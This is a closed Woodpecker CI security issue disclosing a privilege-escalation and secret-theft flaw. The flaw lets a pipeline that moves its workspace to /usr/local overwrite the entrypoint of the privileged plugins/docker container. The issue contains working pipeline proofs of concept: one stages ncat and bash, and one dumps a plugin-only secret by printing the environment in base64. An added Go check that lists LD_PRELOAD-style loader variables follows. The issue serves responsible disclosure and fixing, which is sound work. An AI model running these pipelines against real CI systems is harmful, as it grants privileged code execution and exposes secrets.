Getting "privileged permissions" / "secrets value" by using (... an escalated plugin and/) by adjusting workspace #3924

Closed
6543 opened this issue Jul 18, 2024 · 0 comments · Fixed by #3933
6543 commented Jul 18, 2024

Getting privileged permissions using an escalated plugin by adjusting workspace

Dear Woodpecker Security Team,

I am writing to inform you about the possibility of running arbitrary code in a privileged container using the default configuration.
As you know, the default configuration has multiple containers that run in privileged mode. These include the "plugins/docker" image. (I haven't looked at the other images, though I'm sure they are vulnerable to the same or similar exploits.)
My POC uses the workspace attribute with the base set to "/usr/local". This way, I can place a file at "/usr/local/bin/dockerd-entrypoint.sh" in a step before the "plugins/docker" step to overwrite the commands executed in the privileged container.

workspace:
  base: /usr/local/

steps:
- name: prepare
  image: alpine
  commands:
    - mkdir -p /usr/local/bin/
    - cp fake-local/bin/dockerd-entrypoint.sh /usr/local/bin/dockerd-entrypoint.sh
    - cp ncat /usr/local/ncat
    - cp bash /usr/local/bash
    - chmod +x /usr/local/bin/dockerd-entrypoint.sh
    - chmod +x /usr/local/ncat
    - chmod +x /usr/local/bash
- name: drone
  image: plugins/docker

This is possible because the only things checked before allowing the setting of the container to privileged are that the "Commands" and "Entrypoint" attributes are unset using the "IsPlugin" function.
There are multiple other ways to gain code execution in the privileged container, such as setting environment variables like "LD_PRELOAD".

I only tested this in the docker runner, but looking at the code, the same should be possible for the kubernetes runner.

I'm not sure how to fix this correctly, as it is broken by design when allowing the building of docker images inside the CI.

Similar bugs exist in the Drone CI, so a scheduled disclosure with them makes sense.

I am also informing you that I am the author of a CTF Challenge where people tried to find and exploit this bug. The event was a final to a qualification with a small number of participants. Two teams solved the challenge by finding other bugs. I will tell them to report their found vulnerability as well.

Feel free to follow up with any questions.

Best,
Daniel Kilimnik

Neodyme AG


Getting secrets value using manipulated entrypoint via adjusted workspace

  1. create a secret called TOKEN for the plugin plugins/docker only

  2. create this pipeline

skip_clone: true

workspace:
  base: /usr/local/

steps:
- name: prepare
  image: alpine
  commands:
    - mkdir -p /usr/local/bin/
    - 'echo "#!/bin/sh" > /usr/local/bin/dockerd-entrypoint.sh'
    - 'echo "env" >> /usr/local/bin/dockerd-entrypoint.sh'
    - 'echo "echo -------" >> /usr/local/bin/dockerd-entrypoint.sh'
    - 'echo "env | base64" >> /usr/local/bin/dockerd-entrypoint.sh'
    - chmod +x /usr/local/bin/dockerd-entrypoint.sh
- name: drone
  image: plugins/docker
  settings:
    token:
      from_secret: TOKEN

  3. decode the base64 and voilà, successfully reused the exploit in a different area



GHSA-xw35-rrcp-g7xm
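
The report above says escalation to privileged is gated only on "Commands" and "Entrypoint" being unset. The following Go sketch is an added example, not Woodpecker's code and not the change made in #3933: a stricter pre-flight check that also flags an escalated plugin step when the pipeline relocates the workspace or sets loader variables. The `Step` type, the `/woodpecker` default base, the image list and the variable list are assumptions of this example.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// Step is a simplified, hypothetical stand-in for a parsed pipeline step.
type Step struct {
	Name, Image          string
	Commands, Entrypoint []string
	Environment          map[string]string
}

// Assumed for this sketch: default base path, escalated images, loader variables.
const defaultBase = "/woodpecker"

var escalated = map[string]bool{"plugins/docker": true}
var loaderVars = []string{"LD_PRELOAD", "LD_LIBRARY_PATH", "PATH"}

// Findings lists reasons an escalated plugin step should not run privileged.
func Findings(workspaceBase string, steps []Step) []string {
	var out []string
	for _, s := range steps {
		image := s.Image // strip a trailing tag such as ":latest"
		if i := strings.LastIndex(image, ":"); i > strings.LastIndex(image, "/") {
			image = image[:i]
		}
		// The check the report describes: no commands and no entrypoint.
		if len(s.Commands)+len(s.Entrypoint) > 0 || !escalated[image] {
			continue
		}
		if b := path.Clean(workspaceBase); workspaceBase != "" && b != defaultBase {
			out = append(out, fmt.Sprintf("%s: workspace base %q overlays image paths", s.Name, b))
		}
		for _, v := range loaderVars {
			if _, ok := s.Environment[v]; ok {
				out = append(out, fmt.Sprintf("%s: pipeline sets %s", s.Name, v))
			}
		}
	}
	return out
}

func main() { // constructed input mirroring the pipeline in the report
	steps := []Step{{Name: "drone", Image: "plugins/docker"}}
	fmt.Println(Findings("/usr/local/", steps))
}
```

A non-empty result means the step should be refused escalation or the pipeline rejected at lint time.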

@6543 6543 closed this as completed Jul 18, 2024
@6543 6543 self-assigned this Jul 18, 2024
@6543 6543 added the security label Jul 18, 2024
@6543 6543 changed the title from "RESERVED" to "Getting privileged permissions using an escalated plugin by adjusting workspace / Getting secrets value using manipulated entrypoint via adjusted workspace" Oct 4, 2024
@6543 6543 changed the title from "Getting privileged permissions using an escalated plugin by adjusting workspace / Getting secrets value using manipulated entrypoint via adjusted workspace" to "Getting "privileged permissions" / "secrets value" by using (... an escalated plugin and/) by adjusting workspace" Oct 4, 2024